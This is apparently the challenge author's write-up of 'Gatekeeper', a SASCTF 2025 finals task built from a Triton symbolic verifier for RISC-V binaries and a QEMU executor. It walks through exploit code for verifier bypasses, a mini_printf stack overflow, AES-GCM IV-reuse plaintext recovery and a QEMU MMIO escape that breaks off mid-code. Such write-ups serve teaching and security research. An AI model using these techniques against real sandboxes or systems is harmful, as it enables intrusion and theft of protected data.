Gatekeeper: Triton-Powered BPF for RISC-V (SASCTF'25 Finals)


CTF

SASCTF

Triton

RISC-V

QEMU

Last year I proposed building a never-before-seen A/D CTF challenge for the SASCTF 2025 Finals. That kicked off a months-long journey of designing and implementing a custom Triton-based symbolic verifier and a QEMU machine for bare-metal RISC-V, with the goal of creating a unique exploitation challenge. I believe my teammates and I succeeded! Here is the Gatekeeper story. Enjoy!

Table of Contents:

Service Architecture

The Goal

Vuln 1: Improper Modelling of Return Values

Vuln 2: BOF in mini_printf

Vuln 3: Ciphertext + IV Leak via File Type Confusion

Vuln 4: Ciphertext + IV Leak via Uninitialized Memory

Vuln 5: QEMU Escape via MMIO Device

BPF? We’ve got BPF at home.

BPF at home:



The core idea: we perform BPF-style verification of bare-metal RISC-V binaries using Triton-based symbolic execution. You write a small RV64 program (no OS, no libc) and submit it to /verify; if the verifier is happy, you get an Ed25519 signature. Send the program + signature to /execute and it runs inside QEMU with access to a trusted file API. Your code can create files, read them (plain or encrypted), and print output, all through trusted wrappers. Direct MMIO pokes are forbidden.

Flags are stored as files inside a QEMU VM: some as plaintext, some encrypted with AES-128-GCM. To steal them, you need to craft a RISC-V binary that passes symbolic verification, gets executed in the victim’s QEMU, and exfiltrates the flag data.

The challenge had 5 intended vulnerabilities. To get all the flags, teams needed to chain a verifier bypass with either a crypto attack or a QEMU escape.

Service Architecture


The flow is: submit a binary to the verifier, Triton verifies it symbolically and returns an Ed25519 signature if it passes, then submit the binary + signature to the executor, and QEMU runs it.

Memory Map

The full memory map (shared between verifier and QEMU) looks like this:

_MEMORY_MAP_RAW = {
    "gatekeeper-mmio": (0x13370000, 0x13370000 + 0x1000, "---"),
    "handles-table": (0x13400000, 0x13400000 + 0x80000, "---"),
    "trusted-funcs": (
        0x80000000, 0x80000000 + 0x10000, "--x",
        {
            "create_file_plain": (0x80000000, 0x80000000 + 0x2000),
            "create_file_enc": (0x80002000, 0x80002000 + 0x2000),
            "read_file_plain": (0x80004000, 0x80004000 + 0x2000),
            "read_file_enc": (0x80006000, 0x80006000 + 0x2000),
            "mini_printf": (0x8000A000, 0x8000A000 + 0x1000),
        },
    ),
    "user-code": (0x300000, 0x300000 + 0x10000, "r-x"),
    "user-data": (0x310000, 0x310000 + 0x10000, "rw-"),
    "stack": (0x320000, 0x320000 + 0x20000, "rw-"),
}

The permissions matter. gatekeeper-mmio and handles-table are ---, completely inaccessible to user code (the verifier rejects any access). trusted-funcs is --x, the user can call into them but can’t read their code. user-code is r-x, user-data and stack are rw-.
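
To make the permission semantics concrete, here is a minimal sketch of a lookup over that map. The `Region` class and the `check_access` helper are hypothetical names made up for illustration, and rejecting accesses that straddle two regions is an assumption of this sketch, not necessarily what the real verifier does.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    end: int    # exclusive
    perms: str  # "rwx"-style string, "-" means denied


# Addresses and permissions copied from the memory map above.
REGIONS = [
    Region("gatekeeper-mmio", 0x13370000, 0x13370000 + 0x1000, "---"),
    Region("handles-table", 0x13400000, 0x13400000 + 0x80000, "---"),
    Region("trusted-funcs", 0x80000000, 0x80000000 + 0x10000, "--x"),
    Region("user-code", 0x300000, 0x300000 + 0x10000, "r-x"),
    Region("user-data", 0x310000, 0x310000 + 0x10000, "rw-"),
    Region("stack", 0x320000, 0x320000 + 0x20000, "rw-"),
]


def check_access(addr: int, size: int, kind: str) -> bool:
    """True if [addr, addr+size) fits inside one region that grants `kind`."""
    for r in REGIONS:
        if r.start <= addr and addr + size <= r.end:
            return kind in r.perms
    return False  # unmapped (or region-straddling) accesses are rejected


print(check_access(0x310000, 8, "w"))    # user-data is writable
print(check_access(0x13400000, 8, "r"))  # handles-table is off-limits
```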

Each trusted function lives at a fixed address. Participants get a header file with function pointers pointing straight to these addresses:

static const create_file_plain_t create_file_plain = (create_file_plain_t)0x80000000;

static const create_file_enc_t create_file_enc = (create_file_enc_t)0x80002000;

static const read_file_plain_t read_file_plain = (read_file_plain_t)0x80004000;

static const read_file_enc_t read_file_enc = (read_file_enc_t)0x80006000;

static const mini_printf_t mini_printf = (mini_printf_t)0x8000A000;

Calls to trusted functions go through a TRUSTED_CALL macro that clobbers all caller-saved registers after return, matching the register scrubbing the trusted-guest code does on its side:

#define TRUSTED_CALL(fn, ...) \

(__extension__({ typeof(fn(__VA_ARGS__)) __ret = fn(__VA_ARGS__); \

__asm__ volatile("" ::: __TRUSTED_RV64_CLOBBERS); __ret; }))

The Verifier

The verifier is the core of the challenge. It sets up a Triton context for RV64 with the Bitwuzla SMT solver:

def __init__(self) -> None:
    self._ctx = TritonContext(ARCH.RV64)
    self._ctx.setMode(MODE.ALIGNED_MEMORY, True)
    self._ctx.setMode(MODE.CONSTANT_FOLDING, True)
    self._ctx.setMode(MODE.AST_OPTIMIZATIONS, True)
    self._ctx.setMode(MODE.TAINT_THROUGH_POINTERS, True)
    self._ctx.setSolver(SOLVER.BITWUZLA)
    self._ctx.setSolverTimeout(VerifierConfig.solver_timeout_ms)  # 5000 ms

Program setup loads the binary into the code/data regions, sets SP to the top of the stack, and does two important things:

- Stubs trusted functions as ret: the verifier doesn’t execute real trusted code, it intercepts calls at their entry addresses and runs symbolic models instead.

- Taints the entire stack: marking it as uninitialized. Any read of tainted memory gets rejected. Writes untaint the destination.

def _setup_program_context(self, program_blob: bytes):
    # Load binary into code + data regions
    self._ctx.setConcreteMemoryAreaValue(code_region.start, padded_code_blob)
    self._ctx.setConcreteMemoryAreaValue(data_region.start, padded_data_blob)

    # Stub trusted funcs as `ret` (bytes 67 80 00 00, i.e. 0x00008067 little-endian)
    for func in trusted_funcs_region.subregions:
        self._ctx.setConcreteMemoryAreaValue(func.start, bytes.fromhex("67800000"))

    # Taint the entire stack (= "uninitialized")
    for addr in range(stack_region.start, stack_region.end):
        self._ctx.taintMemory(addr)

The main loop steps one instruction at a time (up to 25,000 instructions, 25-second timeout):

def _verify_step_at(self, pc: int) -> None:
    inst_bytes = self._ctx.getConcreteMemoryAreaValue(pc, 4, False)
    self._cur_inst = Instruction(pc, inst_bytes)
    self._ctx.disassembly(self._cur_inst)

    if self._ctx.isRegisterSymbolized(self._ctx.registers.pc):
        self.reject("PC is symbolic!")

    if not any(region.contains(pc) for region in self._executable_regions):
        self.reject("is outside executable regions!")

    if disassembly not in INSTRUCTIONS_WHITELIST:
        self.reject("is not allowed!")

    if self._trusted_funcs_region.contains(pc):
        self._model_trusted_funcs(pc)
        return

    if disassembly.startswith("ebreak"):
        raise VerificationException(passed=True)

    for hook in self._pre_processing_hooks:
        hook(self._cur_inst)

    self._ctx.processing(self._cur_inst)

    for hook in self._post_processing_hooks:
        hook(self._cur_inst)

Every instruction goes through a PC-is-concrete check, an executable-region check, and a whitelist check. If it lands in trusted-funcs, the verifier runs the symbolic model instead of the real code. ebreak is the clean termination instruction: it signals successful verification and cleanly exits QEMU at runtime. Anything else goes through Triton’s emulation with pre/post hooks.

Memory access hooks fire on every load/store to enforce the permission map: is this address readable/writable? Is it tainted (uninitialized)? Is the write target symbolic (not allowed)?
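
The taint rule (reads of uninitialized stack are rejected, writes untaint) can be sketched with a plain set acting as shadow memory. `ShadowStack` is a hypothetical stand-in for illustration; the real verifier relies on Triton's taint engine rather than anything like this.

```python
class ShadowStack:
    """Toy shadow memory: every stack byte starts out tainted (uninitialized)."""

    def __init__(self, start: int, end: int) -> None:
        self.tainted = set(range(start, end))

    def write(self, addr: int, size: int) -> None:
        # A store initializes its destination bytes, so they become untainted.
        self.tainted.difference_update(range(addr, addr + size))

    def read(self, addr: int, size: int) -> None:
        # A load touching any still-tainted byte is rejected.
        if any(a in self.tainted for a in range(addr, addr + size)):
            raise ValueError(f"read of uninitialized memory at {addr:#x}")


stack = ShadowStack(0x320000, 0x340000)  # stack region from the memory map
stack.write(0x33FFF0, 8)
stack.read(0x33FFF0, 8)                  # fine: these bytes were written first
try:
    stack.read(0x33FFF8, 8)              # never written, so it is rejected
except ValueError as exc:
    print("rejected:", exc)
```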

The instruction whitelist includes RV32I/RV64I, the M extension (mul/div), and common pseudoinstructions. No CSRs, no atomics, no floats, no ecall.

The participant API also provides a verifier_ranged_u32(v, lo, hi) helper, a branchless clamp that produces a symbolic value guaranteed to lie within [lo, hi]. This lets user code guide the verifier about possible value ranges without creating symbolic branches (e.g., for safe array indexing):

__attribute__((optimize("O0"), optnone, noipa, noinline))

uint32_t verifier_ranged_u32(uint32_t v, uint32_t lo, uint32_t hi)

{

v ^= (v ^ lo) & (uint32_t)-(v < lo);

v ^= (v ^ hi) & (uint32_t)-(v > hi);

return v;

}
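
For readers who want to poke at the trick outside of C, here is a direct Python port of the same two XOR-and-mask steps. The name `ranged_u32` and the explicit `MASK32` are only there to emulate 32-bit unsigned arithmetic; they are not part of the participant API.

```python
MASK32 = 0xFFFFFFFF


def ranged_u32(v: int, lo: int, hi: int) -> int:
    """Branchless clamp of v into [lo, hi], emulating uint32_t arithmetic."""
    v &= MASK32
    # -(cond) is all-ones when cond is true and zero otherwise, so the XOR
    # either swaps v for the bound or leaves it untouched.
    v ^= (v ^ lo) & (-(v < lo) & MASK32)
    v ^= (v ^ hi) & (-(v > hi) & MASK32)
    return v


print(ranged_u32(5, 10, 20), ranged_u32(15, 10, 20), ranged_u32(25, 10, 20))
```

Because no comparison ever feeds a branch, the symbolic engine sees a single expression instead of forking the path.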

Proving Control-Flow Determinism

This is the interesting part. BPF verifiers ensure no unbounded jumps. Here, every jalr (indirect jump) with a symbolic target register gets passed through an SMT query. The pre-processing hook _try_prove_jalr_has_only_1_target_if_symbolic asks: under the current path constraints, can this register take more than one value?

It queries reg < concrete_value and reg > concrete_value. If either is SAT, the target is ambiguous, the register stays symbolic, and the next iteration rejects it with “PC is symbolic!”. If both are UNSAT, the register is proven to have exactly one feasible value, and we concretize it.

This is how the verifier enforces that user code can only jump to known addresses. No computed gotos, no wild function pointer calls (unless the verifier’s model makes it think there’s only one option…).
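
The shape of that uniqueness query can be sketched without a solver by brute-forcing a tiny input domain. Everything here (`has_single_target`, the lambdas, the example addresses) is hypothetical; the real hook asks Bitwuzla through Triton instead of enumerating.

```python
from typing import Callable, Iterable


def has_single_target(
    target_of: Callable[[int], int],
    path_constraint: Callable[[int], bool],
    domain: Iterable[int],
    concrete: int,
) -> bool:
    """True if every input allowed by the path constraint yields `concrete`."""
    feasible = [x for x in domain if path_constraint(x)]
    below = any(target_of(x) < concrete for x in feasible)  # "reg < concrete" SAT?
    above = any(target_of(x) > concrete for x in feasible)  # "reg > concrete" SAT?
    return not (below or above)


# Made-up jump-table computation: four possible targets, 0x10 bytes apart.
def target(x: int) -> int:
    return 0x300100 + 0x10 * (x & 3)


print(has_single_target(target, lambda x: x % 4 == 2, range(256), 0x300120))
print(has_single_target(target, lambda x: x < 8, range(256), 0x300120))
```

The first call models a path where earlier constraints pin the index down, so the jump is provably unique; the second leaves several targets feasible and would be rejected.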

Symbolic Memory Reads

This is probably the most interesting part of the verifier. When user code loads from a symbolic pointer (e.g., array indexing with a symbolic index), Triton by default just reads from whatever concrete address it computed for this execution. That’s not good enough: we need to reason about all addresses the pointer could take. The MemoryModeller (loosely based on “Towards Symbolic Pointers Reasoning in Dynamic Symbolic Execution”) handles this as a post-processing hook on every instruction that has a load with a symbolic LEA.

The hook fires after Triton’s processing(), iterating over the instruction’s load accesses:

def model_symbolic_memory_read_hook(self, inst: Instruction) -> None:
    for ma, _ in inst.getLoadAccess():
        lea = ma.getLeaAst()
        if not (lea and lea.isSymbolized()):
            continue

        size = ma.getSize()
        bits = lea.getBitvectorSize()
        anchor = ma.getAddress()  # Triton's concrete EA for this execution

Step 1: Bounds check. First, we check that the symbolic address can’t exceed anchor ± max_elems * size (where max_elems = 0x100). We ask the solver: “can lea be above the upper limit?” and “can lea be below the lower limit?”. If either is SAT, the read is unbounded and gets rejected:

max_elems = VerifierConfig.max_symbolic_read_elems  # 0x100
upper_start_limit = anchor + max_elems * size
lower_start_limit = anchor - max_elems * size if anchor >= max_elems * size else 0

upper_check = pc_and(
    self._ctx,
    self._actx.bvugt(lea, bv(self._actx, upper_start_limit, bits)),
)
lower_check = pc_and(
    self._ctx,
    self._actx.bvult(lea, bv(self._actx, lower_start_limit, bits)),
)

if is_sat(self._ctx, upper_check):
    self.verifier.reject(f"reads from symbolic address unbounded above!")

if is_sat(self._ctx, lower_check):
    self.verifier.reject(f"reads from symbolic address unbounded below!")

pc_and conjoins the check with the current path predicate, so bounds reasoning takes into account all the constraints accumulated so far (including those pushed by trusted function models).

Step 2: Tighten the bounds. If the coarse check passes, binary-search for the exact tightest upper/lower feasible addresses:

upper_start_exact = self._binary_search_bound(lea, anchor, upper_start_limit, True)

lower_start_exact = self._binary_search_bound(lea, lower_start_limit, anchor, False)

The binary search works by repeatedly asking the solver: “can lea >= mid?” (for upper bound) or “can lea <= mid?” (for lower bound), halving the range each time:

def _binary_search_bound(self, node, low, high, find_upper):
    while low < high:
        mid = (low + high) // 2
        check = (
            pc_and(self._ctx, self._actx.bvuge(node, bv(self._actx, mid, node.getBitvectorSize())))
            if find_upper
            else pc_and(self._ctx, self._actx.bvule(node, bv(self._actx, mid, node.getBitvectorSize())))
        )
        if is_sat(self._ctx, check):
            if find_upper:
                low = mid + 1
            else:
                high = mid
        else:
            if find_upper:
                high = mid
            else:
                low = mid + 1
    return low if find_upper else high
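
To see how the search behaves, here is a solver-free port where a plain set of feasible addresses stands in for the SMT queries. The function name, the `feasible` set and the example addresses are assumptions for illustration only.

```python
def binary_search_bound(feasible: set, low: int, high: int, find_upper: bool) -> int:
    """Same loop as above, with set membership replacing the solver calls."""
    while low < high:
        mid = (low + high) // 2
        if find_upper:
            sat = any(a >= mid for a in feasible)  # "can lea >= mid?"
        else:
            sat = any(a <= mid for a in feasible)  # "can lea <= mid?"
        if sat:
            if find_upper:
                low = mid + 1
            else:
                high = mid
        else:
            if find_upper:
                high = mid
            else:
                low = mid + 1
    return low if find_upper else high


size = 8
anchor = 0x310010
feasible = {0x310008, 0x310010, 0x310018}  # made-up feasible addresses
upper = binary_search_bound(feasible, anchor, anchor + 0x100 * size, True)
lower = binary_search_bound(feasible, anchor - 0x100 * size, anchor, False)
candidates = list(range(lower, upper + 1, size))
print(hex(lower), hex(upper), [hex(c) for c in candidates])
```

In this toy run the lower search returns the smallest feasible address, while the upper search stops at the first value for which the query turns UNSAT, i.e. one past the largest feasible address. That slack does not matter here because the candidate list is stepped by `size` and each candidate is re-checked for feasibility afterwards.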

Step 3: Prove alignment. We check that lea % size == 0 is always true under the path constraints. This limits the number of ITE cases, simplifying the resulting formula and thus making it feasible for the solver to reason about. For 8-byte loads on an aligned pointer, we only need to consider one address per 8-byte chunk instead of eight:

def _prove_mem_access_aligned(self, lea_ast, size):
    bits = lea_ast.getBitvectorSize()
    mask = bv(self._actx, size - 1, bits)
    cond = pc_and(
        self._ctx,
        self._actx.distinct(self._actx.bvand(lea_ast, mask), bv(self._actx, 0, bits)),
    )
    return not is_sat(self._ctx, cond)

Step 4: Enumerate feasible addresses. Generate all aligned candidates in [lower, upper], then filter to only those that the solver says are actually reachable:

candidates = list(range(lower_start_exact, upper_start_exact + 1, size))
feasible = [
    a for a in candidates
    if is_sat(
        self._ctx,
        pc_and(self._ctx, self._actx.equal(lea, bv(self._actx, a, bits))),
    )
]

Step 5: Taint and permission checks. Every feasible address must be non-tainted (initialized) and in a readable region:

for addr in feasible:
    if self._ctx.isMemoryTainted(MemoryAccess(addr, size)):
        self.verifier.reject(
            f"might access tainted memory at 0x through symbolic pointer")
    self.verifier.verify_memory_range(addr, size, MemoryAccessType.READ)

Step 6: Build the ITE expression. Finally, construct a chain of ite(lea == addr, mem[addr], ...), one branch per feasible address, and assign it to the load’s destination register:

def _build_ite_for_memory_access(self, lea, size, addresses):
    expr = bv(self._actx, 0, size * 8)
    for addr in reversed(addresses):
        cond = ast.equal(lea, bv(self._actx, addr, ea_bw))
        val = self._ctx.getMemoryAst(MemoryAccess(addr, size))
        expr = ast.ite(cond, val, expr)
    return expr

After this hook, the destination register holds a symbolic expression that correctly represents the value for any feasible address the pointer could take. The rest of the verifier (and the solver) can then reason about downstream uses of this value as usual.
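
The ITE chain is easy to picture with nested tuples instead of Triton AST nodes. This is a toy model: `build_ite`, `evaluate` and the memory contents are hypothetical, and real values would be symbolic memory ASTs rather than integers.

```python
def build_ite(addresses, memory, default=0):
    """Build ("ite", addr, value, else_branch) nodes, innermost branch first."""
    expr = ("const", default)
    for addr in reversed(addresses):
        expr = ("ite", addr, memory[addr], expr)
    return expr


def evaluate(expr, lea):
    """Walk the chain until a branch matches the concrete pointer value."""
    while expr[0] == "ite":
        _, addr, value, otherwise = expr
        if lea == addr:
            return value
        expr = otherwise
    return expr[1]  # fell through every branch: the default constant


memory = {0x310000: 11, 0x310008: 22, 0x310010: 33}  # made-up contents
expr = build_ite(sorted(memory), memory)
print(evaluate(expr, 0x310008))
```

Iterating in reverse means the outermost test is for the lowest address, mirroring the `reversed(addresses)` loop above.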

N.B. This approach has a known limitation: it assumes the feasible address range is contiguous within one memory region. If feasible addresses span disjoint regions, it might over-reject valid cases. In practice this doesn’t matter for Gatekeeper since the user-accessible regions are laid out contiguously (user-code, user-data, stack).

Trusted Function Models

When the PC hits a trusted function address, the verifier doesn’t execute anything. Instead it runs a Python model that:

- Extracts arguments from a0-a7 (must be concrete, except for specific cases).

- Validates pointer arguments (must point into valid, readable/writable regions of the right size).

- Symbolizes outputs, e.g., read_file_plain fills [fbytes, fbytes+fsize) with fresh symbolic bytes and untaints them.

- Constrains the return value. For create_file_plain/create_file_enc, returns a fresh symbolic handle. For read_file_plain/read_file_enc, returns a constrained symbolic int32.

- Scrubs caller-saved registers (t0-t6, a1-a7, etc.), matching what the real trusted-guest code does, so the verifier and executor stay in sync.

For example, model_read_file_plain does this after validation:

# Symbolize output buffer
for i in range(fsize):
    self._ctx.untaintMemory(fbytes + i)
    self._ctx.setConcreteMemoryValue(MemoryAccess(fbytes + i, 1), 0, True)
    self._ctx.symbolizeMemory(MemoryAccess(fbytes + i, 1),
                              f"read_file_plain_byte__...")

# Return: sign-extended 32-bit symbolic, constrained to {0}
self._ctx.pushPathConstraint(ast.equal(ret32, ast.bv(0, 32)))

That last line is where vuln 1 lives: the constraint only allows 0, not -1.

The Executor (QEMU)

The executor is a custom QEMU machine (-machine gatekeeper) built from a patched QEMU 10.1.0. It defines the same memory map as the verifier, loads the trusted library blob at 0x80000000, and initializes a custom MMIO device at 0x13370000.

The MMIO device manages file storage on the host filesystem under /var/gatekeeper/executor/files/. It handles file creation (plain and AES-128-GCM encrypted), reading, decryption, and maintains a handle table in guest RAM at 0x13400000 (the handles-table region, which verified user code is not allowed to touch):

typedef struct __attribute__((packed))

{

uint64_t public_handle;

uint64_t private_handle;

uint32_t encrypted;

} HandleEntry_t;

typedef struct

{

uint32_t total_entries;

HandleEntry_t entries[];

} HandleTable_t;

The public_handle is what user code passes to the file API. The private_handle maps to the actual filename on the host. The encrypted flag tracks the file type. This table is key to exploitation: leaking it gives you all the handles you need to read any stored flag.
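
Once the table bytes are leaked, decoding them is mechanical. Below is a small parsing sketch, assuming little-endian fields and that the packed 20-byte entries start right after the 4-byte `total_entries` counter; `parse_handle_table` and the sample values are made up for illustration.

```python
import struct

HEADER = struct.Struct("<I")   # total_entries
ENTRY = struct.Struct("<QQI")  # public_handle, private_handle, encrypted (packed)


def parse_handle_table(blob: bytes):
    """Decode a raw dump of the handle table into a list of dicts."""
    (total,) = HEADER.unpack_from(blob, 0)
    entries = []
    for i in range(total):
        pub, priv, enc = ENTRY.unpack_from(blob, HEADER.size + i * ENTRY.size)
        entries.append({"public": pub, "private": priv, "encrypted": bool(enc)})
    return entries


# Fabricated sample dump with two entries, purely to exercise the parser.
sample = HEADER.pack(2) + ENTRY.pack(0x1111, 0xAAAA, 0) + ENTRY.pack(0x2222, 0xBBBB, 1)
for entry in parse_handle_table(sample):
    print(entry)
```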

The trusted-guest code runs inside the VM at 0x80000000 and is the only code that talks to the MMIO device. It implements each API function, does a constant-time handle lookup, and, critically, scrubs all caller-saved registers before returning to user code via a trampoline:

#define __TRUSTED_RETURN_COMMON(val) \

register uintptr_t __rv = (uintptr_t)(val); \

__asm__ volatile("mv a0, %0" ::"r"(__rv) : "a0", "memory"); \

void* fp = __builtin_frame_address(0); \

void** __slot = (void**)((char*)fp - (int)sizeof(void*)); \

void* __orig_ra = *__slot; \

*__slot = (void*)&__trusted_scrub_after_epilogue_keep_a0; \

__asm__ volatile("mv a1, %0" ::"r"(__orig_ra) : "a1", "memory");

This patches the return address on the stack to point to __trusted_scrub_after_epilogue_keep_a0, an assembly trampoline that zeros all caller-saved registers (except a0 which carries the return value) and then jumps to the real return address. The verifier models the same scrubbing in Python, keeping the two in sync.

The Goal


All exploits start the same way: escape the verifier’s safety guarantees and run unverified code inside QEMU. Once you can do that, you can access the handles table at 0x13400000 and leak all public/private handles. Public handles are enough to read plaintext flags.

For encrypted flags, you need to chain the verifier bypass with either a crypto attack (vulns 3, 4) or a full QEMU escape (vuln 5).

Vuln 1: Improper Modelling of Return Values


The verifier models trusted-lib functions to prove safety. If a model is incomplete, the verifier and runtime desynchronize.

read_file_plain and read_file_enc had a flawed model. It only constrained the return value to 0 (success), ignoring -1 (failure):

ret32_var = self._ctx.newSymbolicVariable(

32, f"read_file_enc_ret32_"

)

ret32 = ast.variable(ret32_var)

ret_sext = ast.sx(a0.getBitSize() - 32, ret32)

self._ctx.setConcreteRegisterValue(a0, 0)

sexpr = self._ctx.newSymbolicExpression(

ret_sext, f"read_file_enc_ret_"

)

self._ctx.assignSymbolicExpressionToRegister(sexpr, a0)

self._ctx.pushPathConstraint(

ast.equal(ret32, ast.bv(0, 32)), # only 0, where's -1?

)

The fix is to constrain the return to {0, -1}:

self._ctx.pushPathConstraint(

ast.lor(

[

ast.equal(ret32, ast.bv(0, 32)),

ast.equal(ret32, ast.bv(0xFFFFFFFF, 32)), # -1

]

)

)

To exploit this, you build a program that indexes into a function pointer array using the return value. The verifier thinks result is always 0, so ptrs[0 + 1] is the only possible target, the safe function. But at runtime, read_file_plain returns -1 (invalid handle), and ptrs[-1 + 1] = ptrs[0], your arbitrary code:

void qemu()

{

TRUSTED_CALL_VOID(mini_printf,

"Should be only seen in QEMU! Reading Prohibited address: %llx\n",

*(uint64_t*)0x13400000);

}

void verifier()

{

TRUSTED_CALL_VOID(mini_printf,

"Should be only seen in Verifier! Totally safe (trust me, bro)...\n");

}

ENTRY_POINT_ATTR void start()

{

char file_data[128] = { 0 };

uint32_t len = sizeof(file_data);

int32_t result =

TRUSTED_CALL(read_file_plain, 0x4141414141414141ULL,

(uint8_t*)file_data, &len);

void* ptrs[2] = { (void*)qemu, (void*)verifier };

((void (*)())ptrs[result + 1])();

ENTRY_POINT_END();

}

The verifier proves that the jalr can only target verifier (via _try_prove_jalr_has_only_1_target_if_symbolic). At runtime, qemu gets called instead.
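
The desynchronization boils down to two different sets of "possible return values". A tiny sketch, with strings standing in for the two function pointers and a hypothetical `feasible_targets` helper:

```python
def feasible_targets(ptrs, allowed_returns):
    """Every jump target reachable through ptrs[result + 1]."""
    return {ptrs[ret + 1] for ret in allowed_returns}


ptrs = ["qemu", "verifier"]                     # same order as in start()

model_view = feasible_targets(ptrs, {0})        # flawed model: return is only 0
fixed_view = feasible_targets(ptrs, {0, -1})    # fixed model: return is 0 or -1
runtime_target = ptrs[-1 + 1]                   # invalid handle returns -1

print(model_view, fixed_view, runtime_target)
```

With the flawed model there is exactly one target, so the jalr is concretized and accepted. With the fixed constraint two targets are feasible, the register stays symbolic, and the program is rejected.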

Full exploit: exploit-verifier-non-symbolic-ret.py


Vuln 2: BOF in mini_printf

Another verifier bypass, but this time through the trusted-guest code itself. The mini_printf implementation has a fixed 16-byte buffer for numeric conversions:

void out_u64_base(uint64_t v, uint32_t base)

{

// @VULN

char buf[16] = { 0 };

const char* digits = "0123456789abcdef";

int32_t i = 0;

...

while (v) {

buf[i++] = digits[v % base];

v /= base;

}

buf[i] = '\0';

A 64-bit value in base 2 needs up to 64 characters. That’s a nice stack overflow. By crafting a large base-2 number you can overwrite the return address and hijack execution within the trusted-guest context.

The catch: the only bytes you can write out of bounds are 0x30 ('0'), 0x31 ('1'), and the terminating 0x00. Not a lot of freedom. But the memory layout helps: the user-data segment lives at 0x310000, and addresses composed of 0x30/0x31 bytes are reachable.

The exploit pre-stages a trampoline in user-data, then triggers the overflow to redirect there:

__attribute__((used)) void do_exploit()

{

// Read handles table, and dump the files.

...

ENTRY_POINT_END();

}

void proxy()

{

__asm__ __volatile__(

".globl proxy_blob_begin\n"

"proxy_blob_begin:\n"

".option push\n"

".option nopic\n"

".option norvc\n"

"la t0, __abs_target\n"

"ld t0, 0(t0)\n"

"jalr ra, t0, 0\n"

"ret\n"

".balign 8\n"

"__abs_target:\n"

".dword do_exploit\n"

".option pop\n"

".globl proxy_blob_end\n"

"proxy_blob_end:\n");

}

ENTRY_POINT_ATTR void start()

{

memcpy((void*)0x313130, (void*)&proxy, 0x40);

TRUSTED_CALL_VOID(mini_printf, "%b\n", 0b110ull << 56ull);

ENTRY_POINT_END();

}

memcpy places the trampoline at 0x313130. The %b format with a large shifted value triggers the base-2 overflow, the corrupted return address lands in our trampoline, which jumps to do_exploit.
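
It is worth checking why `0b110ull << 56` produces exactly that address. The sketch below replays the conversion loop in Python and overlays the result on a made-up stack frame. The saved return address sitting 56 bytes after the start of `buf` and the original return address value are assumptions chosen for illustration; the real frame layout depends on the compiled trusted library.

```python
def out_u64_base(v: int, base: int) -> bytes:
    """Bytes the conversion loop stores, in order: digits LSB-first, then NUL."""
    digits = b"0123456789abcdef"
    out = bytearray()
    while v:
        out.append(digits[v % base])
        v //= base
    out.append(0)
    return bytes(out)


written = out_u64_base(0b110 << 56, 2)

RA_OFFSET = 56                       # assumed distance from buf to the saved ra
frame = bytearray(64)                # buf[16] plus whatever follows it
frame[RA_OFFSET:RA_OFFSET + 8] = (0x8000A123).to_bytes(8, "little")  # made-up ra
frame[:len(written)] = written       # the unchecked buf[i++] writes

new_ra = int.from_bytes(frame[RA_OFFSET:RA_OFFSET + 8], "little")
print(len(written), hex(new_ra))
```

Bits 57 and 58 of the value end up as the bytes 0x31 0x31 right after a 0x30, and the terminating NUL clears the next byte, which is how a return address inside user-data can be spelled with nothing but '0', '1' and 0x00.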

Full exploit: exploit-trusted-funcs-bof.py

Vuln 3: Ciphertext + IV Leak via File Type Confusion


This one requires a verifier bypass first (vuln 1 or 2) to leak handles from the table at 0x13400000.

The trusted API has read_file_plain for plaintext files and read_file_enc for encrypted ones. But nothing enforces that you use the right function for the right file type. Calling read_file_plain on an encrypted file handle gives you the raw ciphertext and IV. No decryption happens.

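AES-GCM encrypts in counter mode, so the keystream depends only on the key and the IV. Knowing the ciphertext + IV is therefore enough for keystream recovery once the same IV can be reused: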

// 1. Leak ciphertext + IV of an encrypted file via type confusion

read_file_plain(<leaked public handle of encrypted file>, file_buffer_leak, &len);

memcpy(iv, file_buffer_leak, 12);

// 2. Create a new encrypted file with known plaintext and the leaked IV

uint64_t new_handle = create_file_enc(

all_zeroes, sizeof(all_zeroes), (uint32_t *)iv, (uint32_t *)tag);

read_file_plain(new_handle, file_buffer_known, &len2);

// 3. XOR to recover the original plaintext

for (uint32_t i = 0; i < len - 12; ++i) {

mini_printf("%c", file_buffer_known[12 + i] ^ file_buffer_leak[12 + i]);

}

The attacker controls the IV passed to create_file_enc, reusing the one leaked from the target file. Both files are encrypted with the same IV, so they share the same keystream. C_known = keystream ^ 0x00... = keystream, so C_known ^ C_target = plaintext.
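
The XOR identity is independent of the cipher, so it can be demonstrated with any keystream generator. The sketch below uses a SHA-256 based toy keystream as a stand-in for AES in counter mode (it is NOT AES-GCM), and the key, IV and plaintext are placeholders.

```python
import hashlib


def toy_keystream(key: bytes, iv: bytes, n: int) -> bytes:
    """Stand-in for a CTR keystream: depends only on (key, iv, block counter)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + iv + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def toy_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    ks = toy_keystream(key, iv, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


key = b"\x01" * 16                  # unknown to the attacker
iv = b"\x02" * 12                   # leaked through the type confusion
secret = b"example plaintext"       # placeholder for the flag

c_target = toy_encrypt(key, iv, secret)              # leaked ciphertext
c_known = toy_encrypt(key, iv, bytes(len(secret)))   # all-zero file, same IV
recovered = bytes(a ^ b for a, b in zip(c_known, c_target))
print(recovered)
```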

The fix: add type checks in the verifier to ensure read_file_plain can only be used with plaintext handles.

Full exploit: exploit-type-confusion.py

Vuln 4: Ciphertext + IV Leak via Uninitialized Memory


The verifier and executor together ensure no data leaks from trusted-guest code to untrusted code. The verifier rejects uninitialized memory reads, and the trusted-guest scrubs caller-saved registers before returning.

But once the verifier is bypassed (via vuln 1 or 2), these guarantees are gone. You can read uninitialized stack memory after calling read_file_enc, which contains the ciphertext and IV from the decryption. From there, the keystream recovery is the same as vuln 3.

This is fundamentally architectural: _mmio_read_plain is used legitimately by the trusted-guest code while working with encrypted files, so the data will always be on the stack. The real fix is to patch the verifier bypasses.

Full exploit: exploit-ciphertext-leak.py

Vuln 5: QEMU Escape via MMIO Device


The most powerful primitive. Requires a verifier bypass first, otherwise the trusted-API compliance checks prevent invalid MMIO access.

With unrestricted MMIO access, the communication contract with the device can be violated. The LENDW register sets the length for FILEDW write operations, but it’s never capped to the actual file_buffer size:

static void gatekeeper_device_write(

void *opaque, hwaddr addr, uint64_t val, unsigned size)

{

GatekeeperDeviceState *s = opaque;

switch (addr) {

...

